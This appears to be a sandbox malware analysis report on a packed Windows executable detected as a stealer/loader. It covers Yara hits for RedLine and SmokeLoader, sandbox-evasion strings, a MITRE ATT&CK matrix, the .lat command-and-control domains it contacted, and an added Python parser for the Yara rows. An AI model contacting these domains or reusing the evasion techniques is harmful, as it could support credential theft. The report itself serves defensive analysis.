      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075CD89
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074DE67
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074CE63
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0073DE40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0075AEF7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0074FEDC
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00746F35
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076EF07
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0073CFAD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: String function: 00408030 appears 42 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: String function: 00744667 appears 65 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: String function: 00414400 appears 65 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: String function: 00738297 appears 72 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728
      Source: HK8IIasL9i.exe, 00000000.00000003.2058726057.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesDefence> vs HK8IIasL9i.exe
      Source: HK8IIasL9i.exe, 00000000.00000000.2050554870.000000000044B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesDefence> vs HK8IIasL9i.exe
      Source: HK8IIasL9i.exe | Binary or memory string: OriginalFilenamesDefence> vs HK8IIasL9i.exe
      Source: HK8IIasL9i.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
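      The two Yara rows above name RedLine and SmokeLoader, and both fire in memory dumps rather than in the file on disk. Two things are worth reading off such rows before taking the family name at face value: the memory-dump identifier says which region the rule hit (here a private, execute-and-write allocation, i.e. code that was unpacked or written at run time, not mapped from the executable), and the rule metadata carries the rule id, fingerprint and threat_name needed to look the rule up. The script below is an added example for this page, not code from the report or from Elastic's rule set. The field layout of the `.sdmp` identifier (`pid.phase.dumpno.base.protect.<unknown>.type.<unknown>`) is inferred from the identifiers on this page and is an assumption; only the base, protection and allocation-type fields are decoded. The verdict it compares the families against is a parameter; the sample call passes "LummaC" as this example's assumption.

```python
"""Decode Joe Sandbox in-memory Yara match rows: the memory-dump identifier
and the rule metadata. Added example; not part of the report or of the
Elastic rules. Identifier field layout is an assumption (see lead-in)."""
import re

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
                0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

MATCH_RE = re.compile(
    r"Source:\s*(?P<dump>[0-9A-Fa-f.]+\.sdmp),\s*type:\s*(?P<kind>[A-Z]+)"
    r"\s*\|?\s*Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$")

# Constructed sample: the four Yara rows of this report, copied verbatim.
SAMPLE_ROWS = """\
Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
"""


def parse_dump_id(dump):
    """Assumed layout: pid.phase.dumpno.base.protect.<unknown>.type.<unknown>."""
    parts = dump.removesuffix(".sdmp").split(".")
    if len(parts) < 7:
        raise ValueError(f"unexpected dump identifier: {dump}")
    protect = int(parts[4], 16)
    mem_type = int(parts[6], 16)
    return {
        "pid": int(parts[0], 16),
        "phase": parts[1],            # passed through, not decoded
        "base": int(parts[3], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "mem_type": MEM_TYPE.get(mem_type, hex(mem_type)),
        # executable + writable + private allocation: code that was not
        # mapped from the file on disk, i.e. unpacked or injected
        "unpacked_code": protect == 0x40 and mem_type == 0x20000,
    }


def parse_meta(text):
    """'k = v, k = v' pairs; split only before a key so that a value such
    as 'file, memory' survives intact."""
    out = {}
    for piece in re.split(r",\s*(?=\w+\s*=)", text):
        if "=" in piece:
            key, value = piece.split("=", 1)
            out[key.strip()] = value.strip()
    return out


def family_of(rule, meta):
    if "threat_name" in meta:                 # Windows.Trojan.<Family>
        return meta["threat_name"].split(".")[-1]
    parts = rule.split("_")                   # Windows_Trojan_<Family>_<hash>
    return parts[2] if len(parts) >= 3 else rule


def parse_match_row(row):
    m = MATCH_RE.search(row)
    if not m:
        return None
    meta = parse_meta(m.group("meta"))
    return {"region": parse_dump_id(m.group("dump")), "kind": m.group("kind"),
            "rule": m.group("rule"), "meta": meta,
            "family": family_of(m.group("rule"), meta)}


def conflicting_families(matches, verdict):
    """Families named by the matches that do not agree with the verdict
    (agreement = one name contains the other, case-insensitively)."""
    v = verdict.lower()
    return sorted({m["family"] for m in matches
                   if not (m["family"].lower() in v or v in m["family"].lower())})


if __name__ == "__main__":
    ms = [m for m in map(parse_match_row, SAMPLE_ROWS.splitlines()) if m]
    for m in ms:
        print(m["rule"], m["region"])
    print("families disagreeing with verdict LummaC:",
          conflicting_families(ms, "LummaC"))     # assumed verdict
```

Both regions decode to PAGE_EXECUTE_READWRITE / MEM_PRIVATE at 0x470000 and 0x730000, so the matches come from code the sample wrote into its own process, and `conflicting_families` lists both rule families as disagreeing with a LummaC verdict. That is the expected shape of a packer or loader stage that shares code with several families; the practical reading is to rank such memory-only family names below a decrypted configuration and to record the rule id and fingerprint so the hit can be reproduced against the same dump.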
Source: HK8IIasL9i.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004707A6 CreateToolhelp32Snapshot,Module32First, 0_2_004707A6
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00430C70 CoCreateInstance, 0_2_00430C70
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c16237f1-f778-4418-a632-d4072e0f42c1
Source: HK8IIasL9i.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: HK8IIasL9i.exe | ReversingLabs: Detection: 55%
Source: HK8IIasL9i.exe | Virustotal: Detection: 40%
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | File read: C:\Users\user\Desktop\HK8IIasL9i.exe
Source: unknown | Process created: C:\Users\user\Desktop\HK8IIasL9i.exe "C:\Users\user\Desktop\HK8IIasL9i.exe"
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Unpacked PE file: 0.2.HK8IIasL9i.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Unpacked PE file: 0.2.HK8IIasL9i.exe.400000.0.unpack
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh 0_2_0043D812
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00441895 push 0000002Dh; retf 0_2_0044189D
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004419BC push esi; iretd 0_2_00441A51
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00441A36 push esi; iretd 0_2_00441A51
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00443469 push ebp; iretd 0_2_0044346C
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0044366E push 9F00CD97h; ret 0_2_004436B1
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h 0_2_0043AE3E
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004477A5 push ebp; iretd 0_2_004477AA
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0047582A push ss; retf 0_2_0047589B
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004758AD push ss; retf 0_2_0047589B
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_004714DC push 00000039h; ret 0_2_004715B3
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00473480 push ebp; ret 0_2_00473483
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00471545 push 00000039h; ret 0_2_004715B3
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0047156B push 00000039h; ret 0_2_004715B3
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076B097 push eax; mov dword ptr [esp], 1D1E1F10h 0_2_0076B0A5
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0076DA77 push eax; mov dword ptr [esp], 707F7E0Dh 0_2_0076DA79
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00753A79 push esp; iretd 0_2_00753A7C
Source: HK8IIasL9i.exe | Static PE information: section name: .text entropy: 7.797011755872956
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HK8IIasL9i.exe TID: 5464 | Thread sleep time: -30000s >= -30000s
Source: Amcache.hve.4.dr | Binary or memory string: VMware
Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(~d%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
Source: HK8IIasL9i.exe, 00000000.00000003.2139420813.0000000000646000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000646000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@~d@~dH~dH~dP~dP~dX~dX~d`~d`~dh~dh~dp~dp~dx~dx~d
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: HK8IIasL9i.exe, 00000000.00000002.2488519478.000000000066E000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0043C1F0 LdrInitializeThunk, 0_2_0043C1F0
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00470083 push dword ptr fs:[00000030h] 0_2_00470083
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_0073092B mov eax, dword ptr fs:[00000030h] 0_2_0073092B
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 0_2_00730D90 mov eax, dword ptr fs:[00000030h] 0_2_00730D90

HIPS / PFW / Operating System Protection Evasion

Source: HK8IIasL9i.exe | String found in binary or memory: rapeflowwj.lat
Source: HK8IIasL9i.exe | String found in binary or memory: crosshuaht.lat
Source: HK8IIasL9i.exe | String found in binary or memory: sustainskelet.lat
Source: HK8IIasL9i.exe | String found in binary or memory: aspecteirs.lat
Source: HK8IIasL9i.exe | String found in binary or memory: energyaffai.lat
Source: HK8IIasL9i.exe | String found in binary or memory: necklacebudi.lat
Source: HK8IIasL9i.exe | String found in binary or memory: discokeyus.lat
Source: HK8IIasL9i.exe | String found in binary or memory: grannyejh.lat
Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Mitre Att&ck Matrix (techniques listed per tactic column; a leading number is the count badge shown in the report's matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 PowerShell; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Virtualization/Sandbox Evasion; 1 Process Injection; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 2 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; 2 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
HK8IIasL9i.exe | 55% | ReversingLabs | Win32.Trojan.AceCrypter |
HK8IIasL9i.exe | 40% | Virustotal | | Browse
HK8IIasL9i.exe | 100% | Avira | HEUR/AGEN.1306978 |
HK8IIasL9i.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 104.21.66.86 | true | false | | high
sustainskelet.lat | unknown | unknown | false | | high
crosshuaht.lat | unknown | unknown | false | | high
rapeflowwj.lat | unknown | unknown | false | | high
grannyejh.lat | unknown | unknown | false | | high
aspecteirs.lat | unknown | unknown | false | | high
discokeyus.lat | unknown | unknown | false | | high
energyaffai.lat | unknown | unknown | false | | high
necklacebudi.lat | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
aspecteirs.lat | false | | high
sustainskelet.lat | false | | high
rapeflowwj.lat | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
energyaffai.lat | false | | high
https://lev-tolstoi.com/api | false | | high
grannyejh.lat | false | | high
necklacebudi.lat | false | | high
crosshuaht.lat | false | | high
discokeyus.lat | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.s | HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/outloo | HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.valvesoftware.com/legal.htm | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | false | | high
